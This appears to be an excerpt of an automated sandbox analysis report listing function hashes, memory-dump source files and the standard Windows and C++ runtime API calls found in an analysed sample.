                                      • Opcode ID: 4a07e28138eb325ae07309914434d8f034a700ccc92aba4ec1e6540c55207615
                                      • Instruction ID: 68bd1558ce696892444ec5fcee3169ffbdec18e4a056138ad146644a039ae0ec
                                      • Opcode Fuzzy Hash: 4a07e28138eb325ae07309914434d8f034a700ccc92aba4ec1e6540c55207615
                                      • Instruction Fuzzy Hash: 41B1A971900269DFDF14DFE8D981AEEBBB9FF48310F140419E805AB25AD770AE41CBA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: cd58933f58399ff8c4397a13256232d1ea5b7390220974bc32a5b3ec76d9dbb5
                                      • Instruction ID: 496d7f53eb391e68602a68e8f514a6d10e67b3e51c2d8d4397c69f5c0dc3a4a2
                                      • Opcode Fuzzy Hash: cd58933f58399ff8c4397a13256232d1ea5b7390220974bc32a5b3ec76d9dbb5
                                      • Instruction Fuzzy Hash: C9511671601206EFDB24CF12C881BBA77A9FF44312F14461DEC8657280E735EC89D79A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EqualOffsetTypeids
                                      • String ID:
                                      • API String ID: 1707706676-0
                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                      • Instruction ID: 941e7413ed0bbd671c1334129516d871900f2cb80cb227c36201c4ffb5bbe51e
                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                      • Instruction Fuzzy Hash: BC518935905209DFEF11CF6AC480AAEBBF8EF55325F14449AEC51AB251D732AE0DCB90
                                      APIs
                                      • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00946186
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                      • String ID:
                                      • API String ID: 3433162309-0
                                      • Opcode ID: d507e9a08b0754d982fe63bc8bf353748c72d1b0726db1b8248580158e7195bd
                                      • Instruction ID: f1d3adb6fc92f2ea4cdcaf518a628aed3bc68c0ed35dc27bde0435d0f02b7324
                                      • Opcode Fuzzy Hash: d507e9a08b0754d982fe63bc8bf353748c72d1b0726db1b8248580158e7195bd
                                      • Instruction Fuzzy Hash: B13159B5A00309EFCF14DF94C4C0FAE7BB9AF86311F1404AAE915AB246D770A944CBA1
                                      APIs
                                        • Part of subcall function 009404B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 009404F5
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,BA3649C5,?,BA3649C5,BA3649C5,?,0098C9F0,000000FF,?,00940589), ref: 009408A0
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00940589), ref: 009408C1
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,BA3649C5), ref: 009408F2
                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00990C30,000000FF), ref: 0094092C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                      • String ID:
                                      • API String ID: 568734227-0
                                      • Opcode ID: e0c4e776bb47abf7eec3c2844cef40293e4f987737c6571d1b0a24069599e6b2
                                      • Instruction ID: af81c13912451e6c1344a375c446093f7dab61cfe8aa850e4444b9c921827e2e
                                      • Opcode Fuzzy Hash: e0c4e776bb47abf7eec3c2844cef40293e4f987737c6571d1b0a24069599e6b2
                                      • Instruction Fuzzy Hash: B1318B71A40204AFEB14CF68D885F16B7A8EB84314F1485A9EE19DB396D736EC10CBA0
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 009533AB
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 009533C4
                                      • Concurrency::location::_Assign.LIBCMT ref: 009533DA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095341B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Base::Concurrency::details::$EventThrow$AssignBlockedConcurrency::location::_Exception@8InternalSpinTraceUntil
                                      • String ID:
                                      • API String ID: 1204113144-0
                                      • Opcode ID: ff4a82bea540d0f54097c314290a8705a4f08eb82d5b0a1969f0670c8a4e6eaf
                                      • Instruction ID: 2a90e6d659f158b7a4f68031a391b7c1e3b453a195c344dff675a800be0c4407
                                      • Opcode Fuzzy Hash: ff4a82bea540d0f54097c314290a8705a4f08eb82d5b0a1969f0670c8a4e6eaf
                                      • Instruction Fuzzy Hash: E7213570B002049FCB05EF68C8C6E6DB7B9EF88361B508559E802E7281DF34EE068B91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 102ce588106370472f9cada700d6498e13c6fb63175593f64d050a566191fc77
                                      • Instruction ID: 5a79ea2dd53e62dc002f2ecceb8e7c13abfeb30bff1239eca7af20f40267d842
                                      • Opcode Fuzzy Hash: 102ce588106370472f9cada700d6498e13c6fb63175593f64d050a566191fc77
                                      • Instruction Fuzzy Hash: 930121B3609606FEF6205A796CC0F2B671ECFC2BB8B318726F22D611C1DA608E004970
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue), ref: 009735C4
                                      • GetLastError.KERNEL32(?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue,0099F560,FlsSetValue,00000000,00000364,?,00974C4B), ref: 009735D0
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue,0099F560,FlsSetValue,00000000), ref: 009735DE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: ebf23819e17d600f5d5f860db339fc1d5b708b52d7d81f930a20eb88de54e8b7
                                      • Instruction ID: 86bb3101bbbbcb813d5b495368e56beb77ec16271eb810c1183042b58009111e
                                      • Opcode Fuzzy Hash: ebf23819e17d600f5d5f860db339fc1d5b708b52d7d81f930a20eb88de54e8b7
                                      • Instruction Fuzzy Hash: 4001473365A223BBC7214F6C9C45E5BBB9CEF44BA1710C521F90ED7240C724DA04A6E0
                                      APIs
                                      • EnterCriticalSection.KERNEL32(009D87E8,?,?,009150EF,009D7168,00992AE0,00000001), ref: 00940F5A
                                      • LeaveCriticalSection.KERNEL32(009D87E8,?,009150EF,009D7168,00992AE0,00000001), ref: 00940F8D
                                      • SetEvent.KERNEL32(00000000,009D7168,00992AE0,00000001), ref: 0094101B
                                      • ResetEvent.KERNEL32 ref: 00941027
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c3b7ebb309519aec8d2a16a2f6160868dcfad83f07bf5f7b6f5d2c2c18dbb1fd
                                      • Instruction ID: 6875d03982d5560dad85b8a067f60a67f6f2ab01b5f6a1ca25ccfc2cc3b4ad21
                                      • Opcode Fuzzy Hash: c3b7ebb309519aec8d2a16a2f6160868dcfad83f07bf5f7b6f5d2c2c18dbb1fd
                                      • Instruction Fuzzy Hash: D9018B31AAD220EBCB149F69FD68D9A37E9EB49301344802BF80287331CB346D44FB80
                                      APIs
                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 009440F5
                                        • Part of subcall function 0094347B: ___crtGetTimeFormatEx.LIBCMT ref: 00943491
                                        • Part of subcall function 0094347B: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009434B0
                                      • GetLastError.KERNEL32 ref: 00944111
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00944127
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00944135
                                        • Part of subcall function 00943251: SetThreadPriority.KERNEL32(?,?), ref: 0094325D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                      • String ID:
                                      • API String ID: 1674182817-0
                                      • Opcode ID: d4b75eb26ed155f64315ab82bd548bb0b8c63756d796307a90c17616ce4145d6
                                      • Instruction ID: efcc5e5342ee8977bcaa6d8c0698a89fbbd7f3f0f06755c2519261bb5ef122ec
                                      • Opcode Fuzzy Hash: d4b75eb26ed155f64315ab82bd548bb0b8c63756d796307a90c17616ce4145d6
                                      • Instruction Fuzzy Hash: B3F0E5B2A083153ADB20F6768C0BFFB369CAF54750F50481AB955F64C6EEA4E90446B0
                                      APIs
                                      • RegisterWaitForSingleObject.KERNEL32(0094917E,00955256,75EC5D89,00955356,000000FF,0000000C), ref: 009431D4
                                      • GetLastError.KERNEL32(?,00955356,75EC5D89,00955256,0094917E,?,?,?,?,0094917E,?,?,?,?,00000000), ref: 009431E3
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009431F9
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943207
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                      • String ID:
                                      • API String ID: 3803302727-0
                                      • Opcode ID: d226671508af5bf10038a2f0e87bf5f810c37869cc7237940c20b072cf98d255
                                      • Instruction ID: 4fe2028000f54abd66faa184fbfbf9bd6c956a4c015b4dbf8e7de4eb8bacad27
                                      • Opcode Fuzzy Hash: d226671508af5bf10038a2f0e87bf5f810c37869cc7237940c20b072cf98d255
                                      • Instruction Fuzzy Hash: 5FF0307160810ABBCF10EFB5CD46FAF776CAB04710F608555B626E60A1DA35DB149B60
                                      APIs
                                      • ___crtCreateEventExW.LIBCPMT ref: 00942EF8
                                      • GetLastError.KERNEL32(?,?,?,?,?,00942729), ref: 00942F06
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00942F1C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00942F2A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                      • String ID:
                                      • API String ID: 200240550-0
                                      • Opcode ID: 46974db9019eab071779059cb1dbf9ffe05c4baba6aa6b1d2e3da8933cdb9cdd
                                      • Instruction ID: 355f6188cfe01f04b769de9a166ef0dce5f038634bd4829e649c30288afc4dcd
                                      • Opcode Fuzzy Hash: 46974db9019eab071779059cb1dbf9ffe05c4baba6aa6b1d2e3da8933cdb9cdd
                                      • Instruction Fuzzy Hash: 76E0206160421526E710F7758D03F7F36EC6B00704FC04454BA15F50C3FD54D90442B1
                                      APIs
                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00942729), ref: 00943103
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00942729), ref: 00943112
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943128
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943136
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                      • String ID:
                                      • API String ID: 3016159387-0
                                      • Opcode ID: ccef685b5cda47c0b54635d2dcf503b9c6b7028f61725bee2705968e161b4771
                                      • Instruction ID: b7a6033f9515ae9e70115a99141e83d19d62c4192f98c395ea5abd1957ccb90d
                                      • Opcode Fuzzy Hash: ccef685b5cda47c0b54635d2dcf503b9c6b7028f61725bee2705968e161b4771
                                      • Instruction Fuzzy Hash: 3BE04F70A0410AA7CB10FFB5DE4AFAF73AC6A04705F604455A542E2051EB24EB089771
                                      APIs
                                      • SetThreadPriority.KERNEL32(?,?), ref: 0094325D
                                      • GetLastError.KERNEL32 ref: 00943269
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0094327F
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094328D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                      • String ID:
                                      • API String ID: 4286982218-0
                                      • Opcode ID: 346d73b79fe560e782e221c39044c79d6e288e3febaf801bbfe19028b1f5566a
                                      • Instruction ID: 28650107c54e2f268dc8a2ab016017046937b479aad42cd8b8a037f128b13e4a
                                      • Opcode Fuzzy Hash: 346d73b79fe560e782e221c39044c79d6e288e3febaf801bbfe19028b1f5566a
                                      • Instruction Fuzzy Hash: 88E04F70604119A7CB10BFB5CD46FAF76ACAA00740F408415B526D10A1DB75D6149760
                                      APIs
                                      • TlsSetValue.KERNEL32(?,00000000,00948526,00000000,?,?,00942729,?,?,?,00000000,?,00000000), ref: 00943323
                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 0094332F
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943345
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00943353
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                      • String ID:
                                      • API String ID: 1964976909-0
                                      • Opcode ID: 68baf3ae18f6a4bce91947180722f423b733c8e4985e62b4faf2978a26a3ebd9
                                      • Instruction ID: 3a3ce495b59b45918180a9f89d22a0302fad339735c9bf401a4f8a7346bae1ec
                                      • Opcode Fuzzy Hash: 68baf3ae18f6a4bce91947180722f423b733c8e4985e62b4faf2978a26a3ebd9
                                      • Instruction Fuzzy Hash: 8DE086705141196BCB10BF76CC06FBF376CAB00741F80C415B915D10B1EF35D6149760
                                      APIs
                                      • TlsAlloc.KERNEL32(?,00942729), ref: 009432C4
                                      • GetLastError.KERNEL32 ref: 009432D1
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009432E7
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009432F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                      • String ID:
                                      • API String ID: 3103352999-0
                                      • Opcode ID: c649c93f6522da28d51a3dfb40833a2d6408ccca34fa44cba4d2bb4a167df325
                                      • Instruction ID: ee0525ce89dc922f4ba98d4e47665e13517aaa503462de5993b000b993744d91
                                      • Opcode Fuzzy Hash: c649c93f6522da28d51a3dfb40833a2d6408ccca34fa44cba4d2bb4a167df325
                                      • Instruction Fuzzy Hash: 7CE0C270A1810557C710FBB98C4BFBF326CAA00315F508A15F236E14E1EA64EA084660
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 00927422
                                        • Part of subcall function 00925FE4: __EH_prolog3.LIBCMT ref: 00925FEB
                                        • Part of subcall function 00925FE4: std::_Lockit::_Lockit.LIBCPMT ref: 00925FF5
                                        • Part of subcall function 00925FE4: std::_Lockit::~_Lockit.LIBCPMT ref: 00926066
                                      • _Find_unchecked1.LIBCPMT ref: 00927633
                                      Strings
                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 0092748A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
